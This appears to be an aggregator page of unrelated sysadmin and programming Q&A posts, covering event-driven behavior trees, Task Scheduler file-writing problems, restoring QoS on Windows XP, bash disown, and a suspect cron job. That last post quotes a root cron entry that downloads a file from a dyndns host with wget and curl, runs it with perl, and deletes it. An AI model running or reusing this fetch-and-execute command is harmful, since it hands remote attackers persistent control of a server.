    I've studied several articles and listened to some talks about behavior trees (mostly the resources available on AIGameDev by Alex J. Champandard). I'm particularly interested in event-driven behavior trees, but I still have some doubts on how to implement them correctly using a scheduler. Just a quick recap: Standard Behavior Tree: Each execution tick the tree is traversed from the root in depth-first order. The execution order is implicitly expressed by the tree structure, so in the case of behaviors parented to a parallel node, even if both children are executed during the same traversal, the first leaf is always evaluated first. Event-Driven BT: During the first traversal the nodes (tasks) are enqueued using a scheduler, which is responsible for updating only the running ones every update. The first traversal implicitly produces a depth-first ordered queue in the scheduler. Non-leaf nodes stay suspended most of the time. When a leaf node terminates (either with success or fail status) the parent (observer) is woken up, allowing the tree traversal to continue, and new tasks are enqueued in the scheduler. Without parallel nodes in the tree there will be at most 1 task running in the scheduler. Without parallel nodes, the tasks in the queue (excluding dynamic-priority implementations) will always be ordered in depth-first order (is this right?). Now, some requirements I think need to be guaranteed by a correct implementation are (I'm not sure though): The result of the traversal should be independent of which implementation strategy is used. The traversal result must be deterministic. I'm struggling trying to guarantee both in the case of parallel nodes. Here's an example: Parallel_1 -->Sequence_1 ---->leaf_A ---->leaf_B -->leaf_C Considering a FIFO policy in the scheduler, before the leaf_A node terminates the tasks in the scheduler are: P1(suspended),S1(suspended),leaf_A(running),leaf_C(running) When leaf_A terminates, leaf_B will be scheduled (at the end of the queue), so the queue will become: P1(suspended),S1(suspended),leaf_C(running),leaf_B(running) In this case leaf_B will be executed after leaf_C at every update, whereas with a non-event-driven traversal from the root node, leaf_B would always be evaluated before leaf_C. So I have a couple of questions: have I understood correctly how event-driven BTs work? How can I guarantee the depth-first order is respected with such an implementation? Is this a common issue, or am I missing something?
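    A minimal Python sketch of one way to keep the queue depth-first under a parallel node: when a leaf finishes, its parent schedules the next child into the slot the finished leaf occupied instead of appending it to the tail. The class names and the slot-passing mechanism are illustrative, not taken from any particular framework:

        RUNNING, SUCCESS = "running", "success"

        class Leaf:
            def __init__(self, name, ticks_to_finish):
                self.name = name
                self.remaining = ticks_to_finish
                self.observer = None  # (parent, child_index) waiting on this task

            def update(self):
                self.remaining -= 1
                return SUCCESS if self.remaining <= 0 else RUNNING

        class Sequence:
            """Suspended parent: woken when a child finishes, then starts the next child."""
            def __init__(self, children):
                self.children = children

            def start(self, scheduler, slot=None):
                self._run_child(scheduler, 0, slot)

            def child_finished(self, scheduler, index, slot):
                if index + 1 < len(self.children):
                    self._run_child(scheduler, index + 1, slot)

            def _run_child(self, scheduler, index, slot):
                child = self.children[index]
                child.observer = (self, index)
                scheduler.schedule(child, slot)

        class Scheduler:
            def __init__(self):
                self.queue = []  # ordered list of running leaf tasks

            def schedule(self, task, slot=None):
                # Inserting at the finished sibling's slot preserves depth-first order;
                # a plain append is exactly what pushes leaf_B behind leaf_C.
                self.queue.insert(len(self.queue) if slot is None else slot, task)

            def tick(self):
                for task in list(self.queue):  # snapshot: tasks scheduled mid-tick wait a tick
                    if task.update() == SUCCESS:
                        slot = self.queue.index(task)
                        self.queue.remove(task)
                        if task.observer:
                            parent, index = task.observer
                            parent.child_finished(self, index, slot)
                print([t.name for t in self.queue])

        # Parallel_1 --> (Sequence_1 --> leaf_A, leaf_B), leaf_C
        leaf_a, leaf_b, leaf_c = Leaf("leaf_A", 1), Leaf("leaf_B", 3), Leaf("leaf_C", 3)
        sched = Scheduler()
        Sequence([leaf_a, leaf_b]).start(sched)  # the parallel node enqueues its branches in order
        sched.schedule(leaf_c)
        sched.tick()  # leaf_A finishes and leaf_B takes its slot: ['leaf_B', 'leaf_C']

    With a plain FIFO append the first tick would leave the queue as [leaf_C, leaf_B]; inserting at the finished child's slot keeps it [leaf_B, leaf_C], which matches the order a full root-to-leaf traversal would produce.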

    Read the article

  • Why can't PHP script write a file on server 2008 via command line or task scheduler?

    - by rg89
    I have a PHP script. It runs well when I use a browser. It writes an XML file in the same directory. The script takes ~60 seconds to run, and the resulting XML file is ~16 MB. I am running PHP 5.2.13 via FastCGI on Server 2008 64 bit. I created a task in task scheduler to run c:\php5\php.exe "D:\inetpub\tools\something.php" No error returned, but no file created. If I run this same path and argument at a command line it does not error and does not create the file. I am doing a simple fopen fwrite fclose to save the contents of a php variable to a .xml file, and the file only gets created when the script is run through the browser. Thanks
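    One frequent culprit with scheduled scripts is a relative output path: under Task Scheduler the working directory is often C:\Windows\System32 rather than the script's folder, so the write either lands elsewhere or is denied. A small sketch of the anchor-to-the-script-directory pattern, shown in Python for illustration (the same idea applies to the fopen() call; the output file name is hypothetical):

        from pathlib import Path

        # Resolve the output file against the script's own directory rather than
        # whatever working directory the scheduler happened to use.
        script_dir = Path(__file__).resolve().parent
        out_path = script_dir / "output.xml"  # hypothetical file name
        out_path.write_text("<results/>", encoding="utf-8")
        print("wrote", out_path)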

    Read the article

  • How can I reinstall QoS Packet Scheduler if it was removed from the winxp installation by nLite?

    - by Irwin1138
    I have a WinXP SP3 installation modified by nLite. This particular installation was stripped of the QoS Packet Scheduler. I was advised to remove QoS because of the overhead it produces or something like that. Now, I read this Lifehacker post about Windows maintenance, and it says that on the contrary, by doing so I may have done more harm than good: Disabling QoS in Windows XP: Rumor had it that Microsoft had permanently tied up 20 percent of your net bandwidth for Windows Update. They didn't, and those who disable QoS, or IPv6, in XP actually end up with some pretty harsh connectivity problems. I tend to believe this, and now I seek a way to reinstall QoS. I tried to install it by going to network adapter properties - install - service, but there is no QoS there. I have the original, untouched WinXP SP3 CD. So, is there a way to bring back QoS into my WinXP installation, preferably without reinstalling Windows from scratch?

    Read the article

  • How to disconnect a running bash job from the shell in Linux?

    - by raven
    I have a script that starts a server on a remote VM. All works great until I close the shell where I executed the script. When the shell closes, so does the server. After some looking around I found the following: appending & will send the job to the background; disown -h will disconnect the job from the shell and allow it to run regardless of the shell. The command I used is: ./startServer.sh nasb_wxscat160_catalog-4.1.6 1.0.8 > catalog-log.txt & disown -h When I closed the shell and checked using ps -ef | grep java to see if the job is still working, I did see it in the list. However, when I tried to connect to the server it was unresponsive. On deeper inspection, the log file was filled only up until I closed the shell, and using the ps -m flag I saw the process's jobs were not working. Has anyone encountered something of this sort?
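    For comparison, a minimal Python sketch of the same detachment idea: start the server in its own session with its stdio redirected, so closing the launching shell no longer delivers SIGHUP to it. The command line is taken from the question; start_new_session calls setsid() under the hood (POSIX only):

        import subprocess

        log = open("catalog-log.txt", "ab")
        proc = subprocess.Popen(
            ["./startServer.sh", "nasb_wxscat160_catalog-4.1.6", "1.0.8"],
            stdin=subprocess.DEVNULL,   # detach from the terminal's stdin
            stdout=log,
            stderr=subprocess.STDOUT,
            start_new_session=True,     # new session, so no SIGHUP when the shell exits
        )
        print("server pid:", proc.pid)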

    Read the article

  • Suspect cron job Centos 6.5 + Virtualmin, Recommended course of action?

    - by sr_1436048
    I was doing some routine maintenance on my server and noticed a new cron job. It is set to run every 5 minutes as root: cd /tmp;wget http://eventuallydown.dyndns.biz/abc.txt;curl -O http://eventuallydown.dyndns.biz/abc.txt;perl abc.txt;rm -f abc* I've tried to download the file, but there is nothing to download. The server is running normally and there are no strange signs that the box has been compromised other than this entry. The only thing I can think of is I recently installed Varnish Cache following this tutorial. Given that I did not enter the cron job and that there appears to be nothing wrong, besides disabling that cron job what would be the appropriate course of action from this point?

    Read the article

  • My PowerShell script won't save a file when run using Task Scheduler, do I need to specify a specific argument?

    - by EGr
    I have a script that downloads a temporary Excel file, copies parts of it to a new file, and saves it to a specific location on the network. The problem I'm having is that the new file is never created/saved. If I run the script locally (through cmd.exe, PowerShell, or PowerShell ISE), it WILL save the file locally, or to the network. If I try running the script via a schedule or on-demand via Task Scheduler, the temporary file is created, but the final document is never created or saved. Is there a specific argument I need to pass, or anything I could be doing wrong? This is the command I'm currently using: powershell.exe -file C:\path\to\my\powershell\script\thescript.ps1 Since it uses environment variables, and other variables relative to the script's position, I also set "Start in" to C:\path\to\my\powershell\script\

    Read the article
